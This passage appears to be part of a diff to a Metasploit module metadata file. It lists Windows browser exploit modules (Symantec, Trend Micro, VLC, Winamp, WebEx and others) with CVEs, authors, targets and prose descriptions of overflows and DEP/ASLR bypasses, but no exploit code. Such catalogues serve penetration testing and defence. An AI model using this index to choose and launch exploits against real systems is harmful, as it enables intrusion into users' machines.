"targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb", + "is_install_path": true, + "ref_name": "windows/browser/symantec_altirisdeployment_runcmd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/symantec_appstream_unsafe": { + "name": "Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute", + "fullname": "exploit/windows/browser/symantec_appstream_unsafe", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-01-15", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability\n is in the LaunchObj ActiveX control (launcher.dll 5.1.0.82) containing the \"installAppMgr()\"\n method. The insecure method can be exploited to download and execute arbitrary files in the\n context of the currently logged-on user.", + "references": [ + "CVE-2008-4388", + "OSVDB-51410" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/symantec_appstream_unsafe.rb", + "is_install_path": true, + "ref_name": "windows/browser/symantec_appstream_unsafe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/symantec_backupexec_pvcalendar": { + "name": "Symantec BackupExec Calendar Control Buffer Overflow", + "fullname": "exploit/windows/browser/symantec_backupexec_pvcalendar", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-02-28", + "type": "exploit", + "author": [ + "Elazar Broad " + ], + 
"description": "This module exploits a stack buffer overflow in Symantec BackupExec Calendar Control.\n By sending an overly long string to the \"_DOWText0\" property located\n in the pvcalendar.ocx control, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2007-6016", + "OSVDB-42358", + "BID-26904", + "URL-http://web.archive.org/web/20080302192347/http://secunia.com:80/advisories/27885/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb", + "is_install_path": true, + "ref_name": "windows/browser/symantec_backupexec_pvcalendar", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/symantec_consoleutilities_browseandsavefile": { + "name": "Symantec ConsoleUtilities ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/symantec_consoleutilities_browseandsavefile", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-11-02", + "type": "exploit", + "author": [ + "Nikolas Sotiriu (lofi)" + ], + "description": "This module exploits a stack buffer overflow in Symantecs ConsoleUtilities.\n By sending an overly long string to the \"BrowseAndSaveFile()\" method located\n in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to\n execute arbitrary code", + "references": [ + "CVE-2009-3031", + "OSVDB-59597", + "BID-36698", + "URL-http://sotiriu.de/adv/NSOADV-2009-001.txt", + "URL-http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + 
"autofilter_services": [], + "targets": [ + "Windows XP SP3 English", + "Windows XP SP2 Universal", + "Windows XP SP2 Pro German", + "Windows XP SP3 Pro German" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb", + "is_install_path": true, + "ref_name": "windows/browser/symantec_consoleutilities_browseandsavefile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/synactis_connecttosynactis_bof": { + "name": "Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow", + "fullname": "exploit/windows/browser/synactis_connecttosynactis_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-05-30", + "type": "exploit", + "author": [ + "h1ch4m", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX\n component, specifically PDF_IN_1.ocx. 
When a long string of data is given\n to the ConnectToSynactis function, which is meant to be used for the ldCmdLine\n argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry\n class pointer saved on the stack, resulting in arbitrary code execution under the\n context of the user.\n\n Also note that since the WinExec function is used to call the default browser,\n you must be aware that: 1) The default must be Internet Explorer, and 2) when the\n exploit runs, another browser will pop up.\n\n Synactis PDF In-The-Box is also used by other software such as Logic Print 2013,\n which is how the vulnerability was found and publicly disclosed.", + "references": [ + "OSVDB-93754", + "EDB-25835" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/synactis_connecttosynactis_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/systemrequirementslab_unsafe": { + "name": "Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method", + "fullname": "exploit/windows/browser/systemrequirementslab_unsafe", + "aliases": [], + "rank": 600, + "disclosure_date": "2008-10-16", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module allows attackers to execute code via an unsafe method in\n Husdawg, LLC. 
System Requirements Lab ActiveX Control (sysreqlab2.dll 2.30.0.0)", + "references": [ + "CVE-2008-4385", + "OSVDB-50122", + "US-CERT-VU-166651" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb", + "is_install_path": true, + "ref_name": "windows/browser/systemrequirementslab_unsafe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/teechart_pro": { + "name": "TeeChart Professional ActiveX Control Trusted Integer Dereference", + "fullname": "exploit/windows/browser/teechart_pro", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-08-11", + "type": "exploit", + "author": [ + "mr_me ", + "sinn3r " + ], + "description": "This module exploits an integer overflow in TeeChart Pro ActiveX control. When\n sending an overly large/negative integer value to the AddSeries() property of\n TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the\n value and is later directly trusted and called upon.\n\n This module has been designed to bypass DEP only under IE8 with Java support. 
Multiple\n versions (including the latest version) are affected by this vulnerability that date\n back to as far as 2001.\n\n The following controls are vulnerable:\n\n TeeChart5.ocx Version 5.0.1.0 (clsid: B6C10489-FB89-11D4-93C9-006008A7EED4);\n TeeChart6.ocx Version 6.0.0.5 (clsid: 536600D3-70FE-4C50-92FB-640F6BFC49AD);\n TeeChart7.ocx Version 7.0.1.4 (clsid: FAB9B41C-87D6-474D-AB7E-F07D78F2422E);\n TeeChart8.ocx Version 8.0.0.8 (clsid: BDEB0088-66F9-4A55-ABD2-0BF8DEEC1196);\n TeeChart2010.ocx Version 2010.0.0.3 (clsid: FCB4B50A-E3F1-4174-BD18-54C3B3287258).\n\n The controls are deployed under several SCADA based systems including:\n\n Unitronics OPC server v1.3;\n BACnet Operator Workstation Version 1.0.76", + "references": [ + "OSVDB-74446", + "URL-http://www.stratsec.net/Research/Advisories/TeeChart-Professional-Integer-Overflow" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP SP0-SP3 (IE6/IE7)", + "Windows XP SP0-SP3 + JAVA + DEP bypass (IE8)", + "Windows 7 + JAVA + DEP bypass (IE8)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/teechart_pro.rb", + "is_install_path": true, + "ref_name": "windows/browser/teechart_pro", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/tom_sawyer_tsgetx71ex552": { + "name": "Tom Sawyer Software GET Extension Factory Remote Code Execution", + "fullname": "exploit/windows/browser/tom_sawyer_tsgetx71ex552", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-05-03", + "type": "exploit", + "author": [ + "Elazar Broad", + "rgod", + "juan vazquez " + ], + "description": "This module exploits a remote code execution vulnerability in the tsgetx71ex553.dll\n ActiveX control installed with Tom Sawyer GET Extension Factory due to an incorrect\n initialization 
under Internet Explorer.\n\n While the Tom Sawyer GET Extension Factory is installed with some versions of VMware\n Infrastructure Client, this module has been tested only with the versions installed\n with Embarcadero Technologies ER/Studio XE2 / Embarcadero Studio Portal 1.6. The ActiveX\n control tested is tsgetx71ex553.dll, version 5.5.3.238.\n\n This module achieves DEP and ASLR bypass using the well known msvcr71.dll rop chain. The\n dll is installed by default with the Embarcadero software, and loaded by the targeted\n ActiveX.", + "references": [ + "CVE-2011-2217", + "OSVDB-73211", + "BID-48099", + "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=911" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3", + "IE 8 on Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb", + "is_install_path": true, + "ref_name": "windows/browser/tom_sawyer_tsgetx71ex552", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/trendmicro_extsetowner": { + "name": "Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution", + "fullname": "exploit/windows/browser/trendmicro_extsetowner", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-08-25", + "type": "exploit", + "author": [ + "Trancer " + ], + "description": "This module exploits a remote code execution vulnerability in Trend Micro\n Internet Security Pro 2010 ActiveX.\n When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll\n an attacker may be able to execute arbitrary code.", + "references": [ + 
"CVE-2010-3189", + "OSVDB-67561", + "ZDI-10-165", + "EDB-14878" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/trendmicro_extsetowner.rb", + "is_install_path": true, + "ref_name": "windows/browser/trendmicro_extsetowner", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/trendmicro_officescan": { + "name": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/trendmicro_officescan", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-02-12", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. 
By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-0325", + "OSVDB-33040", + "BID-22585" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2 Pro English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/trendmicro_officescan.rb", + "is_install_path": true, + "ref_name": "windows/browser/trendmicro_officescan", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/tumbleweed_filetransfer": { + "name": "Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/tumbleweed_filetransfer", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-04-07", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in the vcst_eu.dll\n FileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed\n SecureTransport suite. 
By sending an overly long string to the\n TransferFile() 'remotefile' function, an attacker may be able\n to execute arbitrary code.", + "references": [ + "CVE-2008-1724", + "OSVDB-44252", + "URL-http://www.aushack.com/200708-tumbleweed.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal vcst_eu.dll", + "Windows 2000 Pro English", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/tumbleweed_filetransfer.rb", + "is_install_path": true, + "ref_name": "windows/browser/tumbleweed_filetransfer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ubisoft_uplay_cmd_exec": { + "name": "Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution", + "fullname": "exploit/windows/browser/ubisoft_uplay_cmd_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-07-29", + "type": "exploit", + "author": [ + "Tavis Ormandy ", + "Ben Campbell ", + "phillips321 ", + "Richard Hicks " + ], + "description": "The uplay ActiveX component allows an attacker to execute any command line action.\n User must sign in, unless auto-sign in is enabled and uplay must not already be\n running. 
Due to the way the malicious executable is served (WebDAV), the module\n must be run on port 80, so please make sure you have enough privilege to do that.\n Ubisoft released patch 2.04 as of Mon 20th July.", + "references": [ + "CVE-2012-4177", + "OSVDB-84402", + "URL-https://seclists.org/fulldisclosure/2012/Jul/375", + "URL-http://forums.ubi.com/showthread.php/699940-Uplay-PC-Patch-2-0-4-Security-fix" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb", + "is_install_path": true, + "ref_name": "windows/browser/ubisoft_uplay_cmd_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ultramjcam_openfiledig_bof": { + "name": "TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow", + "fullname": "exploit/windows/browser/ultramjcam_openfiledig_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-03-28", + "type": "exploit", + "author": [ + "rgod", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in TRENDnet SecurView Internet\n Camera's ActiveX control. 
By supplying a long string of data as the sFilter\n argument of the OpenFileDlg() function, it is possible to trigger a buffer\n overflow condition due to WideCharToMultiByte (which converts unicode back to)\n overwriting the stack more than it should, which results arbitrary code execution\n under the context of the user.", + "references": [ + "CVE-2012-4876", + "OSVDB-80661", + "EDB-18675" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 7 on Windows Vista" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/ultramjcam_openfiledig_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ultraoffice_httpupload": { + "name": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow", + "fullname": "exploit/windows/browser/ultraoffice_httpupload", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-08-27", + "type": "exploit", + "author": [ + "shinnai", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in Ultra Shareware's Office\n Control. When processing the 'HttpUpload' method, the arguments are concatenated\n together to form a command line to run a bundled version of cURL. If the command\n fails to run, a stack-based buffer overflow occurs when building the error\n message. 
This is due to the use of sprintf() without proper bounds checking.\n\n NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n into memory unmodified.", + "references": [ + "CVE-2008-3878", + "OSVDB-47866", + "BID-30861", + "EDB-6318" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ultraoffice_httpupload.rb", + "is_install_path": true, + "ref_name": "windows/browser/ultraoffice_httpupload", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/verypdf_pdfview": { + "name": "VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow", + "fullname": "exploit/windows/browser/verypdf_pdfview", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-06-16", + "type": "exploit", + "author": [ + "MC ", + "dean " + ], + "description": "The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow\n because it fails to properly bounds-check user-supplied data before copying\n it into an insufficiently sized memory buffer. 
An attacker can exploit this issue\n to execute arbitrary code within the context of the affected application.", + "references": [ + "CVE-2008-5492", + "OSVDB-49871", + "BID-32313" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/verypdf_pdfview.rb", + "is_install_path": true, + "ref_name": "windows/browser/verypdf_pdfview", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/viscom_movieplayer_drawtext": { + "name": "Viscom Software Movie Player Pro SDK ActiveX 6.8", + "fullname": "exploit/windows/browser/viscom_movieplayer_drawtext", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-01-12", + "type": "exploit", + "author": [ + "shinnai", + "TecR0c ", + "mr_me " + ], + "description": "Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control\n in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows\n remote attackers to execute arbitrary code via a long strFontName parameter to the\n DrawText method.\n\n The victim will first be required to trust the publisher Viscom Software.\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\n with Java support.", + "references": [ + "CVE-2010-0356", + "OSVDB-61634", + "EDB-12320" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows IE6-7", + "Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb", + "is_install_path": true, + "ref_name": 
"windows/browser/viscom_movieplayer_drawtext", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/vlc_amv": { + "name": "VLC AMV Dangling Pointer Vulnerability", + "fullname": "exploit/windows/browser/vlc_amv", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-03-23", + "type": "exploit", + "author": [ + "sinn3r " + ], + "description": "This module exploits VLC media player when handling a .AMV file. By flipping\n the 0x41st byte in the file format (video width/height), VLC crashes due to an\n invalid pointer, which allows remote attackers to gain arbitrary code execution.\n The vulnerable packages include: VLC 1.1.4, VLC 1.1.5, VLC 1.1.6, VLC 1.1.7. Also,\n please note that IE 8 targets require Java support in order to run properly.", + "references": [ + "CVE-2010-3275", + "OSVDB-71277", + "URL-http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files", + "URL-http://web.archive.org/web/20130610070348/http://git.videolan.org/?p=vlc/vlc-1.1.git;a=commitdiff;h=fe44129dc6509b3347113ab0e1a0524af1e0dd11" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Internet Explorer 6 on XP SP3", + "Internet Explorer 7 on XP SP3", + "Internet Explorer 8 on XP SP3", + "Internet Explorer 7 on Vista" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/browser/vlc_amv.rb", + "is_install_path": true, + "ref_name": "windows/browser/vlc_amv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/vlc_mms_bof": { + "name": "VLC MMS Stream Handling Buffer Overflow", + "fullname": "exploit/windows/browser/vlc_mms_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-03-15", + "type": "exploit", + 
"author": [ + "Florent Hochwelker", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow in VLC media player VLC media player prior\n to 2.0.0. The vulnerability is due to a dangerous use of sprintf which can result\n in a stack buffer overflow when handling a malicious MMS URI.\n\n This module uses the browser as attack vector. A specially crafted MMS URI is\n used to trigger the overflow and get flow control through SEH overwrite. Control\n is transferred to code located in the heap through a standard heap spray.\n\n The module only targets IE6 and IE7 because no DEP/ASLR bypass has been provided.", + "references": [ + "CVE-2012-1775", + "OSVDB-80188", + "URL-http://www.videolan.org/security/sa1201.html", + "URL-http://web.archive.org/web/20130612051447/http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commit;h=11a95cce96fffdbaba1be6034d7b42721667821c" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Internet Explorer 6 on XP SP3", + "Internet Explorer 7 on XP SP3" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/browser/vlc_mms_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/vlc_mms_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/webdav_dll_hijacker": { + "name": "WebDAV Application DLL Hijacker", + "fullname": "exploit/windows/browser/webdav_dll_hijacker", + "aliases": [], + "rank": 0, + "disclosure_date": "2010-08-18", + "type": "exploit", + "author": [ + "hdm ", + "jduck ", + "jcran " + ], + "description": "This module presents a directory of file extensions that can lead to\n code execution when opened from the share. 
The default EXTENSIONS option\n must be configured to specify a vulnerable application type.", + "references": [ + "URL-http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html", + "URL-http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/webdav_dll_hijacker.rb", + "is_install_path": true, + "ref_name": "windows/browser/webdav_dll_hijacker", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/webex_ucf_newobject": { + "name": "WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow", + "fullname": "exploit/windows/browser/webex_ucf_newobject", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-08-06", + "type": "exploit", + "author": [ + "Tobias Klein", + "Elazar Broad", + "Guido Landi", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject\n ActiveX Control. If a long string is passed to the 'NewObject' method, a stack-\n based buffer overflow will occur when copying attacker-supplied data using the\n sprintf function.\n\n It is noteworthy that this vulnerability was discovered and reported by multiple\n independent researchers. 
To quote iDefense's advisory, \"Before this issue was\n publicly reported, at least three independent security researchers had knowledge\n of this issue; thus, it is reasonable to believe that even more people were aware\n of this issue before disclosure.\"\n\n NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n into memory unmodified.", + "references": [ + "CVE-2008-3558", + "OSVDB-47344", + "BID-30578", + "EDB-6220", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=849", + "URL-http://www.trapkit.de/advisories/TKADV2008-009.txt", + "URL-http://tk-blog.blogspot.com/2008/09/vulnerability-rediscovery-xss-and-webex.html", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2008-08/0084.html", + "URL-http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtml" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/webex_ucf_newobject.rb", + "is_install_path": true, + "ref_name": "windows/browser/webex_ucf_newobject", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/wellintech_kingscada_kxclientdownload": { + "name": "KingScada kxClientDownload.ocx ActiveX Remote Code Execution", + "fullname": "exploit/windows/browser/wellintech_kingscada_kxclientdownload", + "aliases": [], + "rank": 400, + "disclosure_date": "2014-01-14", + "type": "exploit", + "author": [ + "Andrea Micalizzi", + "juan vazquez " + ], + "description": "This module abuses the kxClientDownload.ocx ActiveX control distributed with WellingTech KingScada.\n The ProjectURL property can be abused to download and load arbitrary DLLs from\n arbitrary locations, leading to arbitrary code execution, because of a 
dangerous\n usage of LoadLibrary. Due to the nature of the vulnerability, this module will work\n only when Protected Mode is not present or not enabled.", + "references": [ + "CVE-2013-2827", + "OSVDB-102135", + "BID-64941", + "ZDI-14-011", + "URL-http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb", + "is_install_path": true, + "ref_name": "windows/browser/wellintech_kingscada_kxclientdownload", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/winamp_playlist_unc": { + "name": "Winamp Playlist UNC Path Computer Name Overflow", + "fullname": "exploit/windows/browser/winamp_playlist_unc", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-01-29", + "type": "exploit", + "author": [ + "hdm ", + "Faithless " + ], + "description": "This module exploits a vulnerability in the Winamp media player.\n This flaw is triggered when an audio file path is specified, inside a\n playlist, that consists of a UNC path with a long computer name. This\n module delivers the playlist via the browser. 
This module has only\n been successfully tested on Winamp 5.11 and 5.12.", + "references": [ + "CVE-2006-0476", + "OSVDB-22789", + "BID-16410" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Winamp 5.12 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/winamp_playlist_unc.rb", + "is_install_path": true, + "ref_name": "windows/browser/winamp_playlist_unc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/winamp_ultravox": { + "name": "Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow", + "fullname": "exploit/windows/browser/winamp_ultravox", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-01-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Winamp 5.24. By\n sending an overly long artist tag, a remote attacker may\n be able to execute arbitrary code. 
This vulnerability can be\n exploited from the browser or the Winamp client itself.", + "references": [ + "CVE-2008-0065", + "OSVDB-41707", + "BID-27344" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Winamp 5.24" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/winamp_ultravox.rb", + "is_install_path": true, + "ref_name": "windows/browser/winamp_ultravox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/windvd7_applicationtype": { + "name": "WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/windvd7_applicationtype", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-03-20", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in IASystemInfo.dll ActiveX\n control in InterVideo WinDVD 7. 
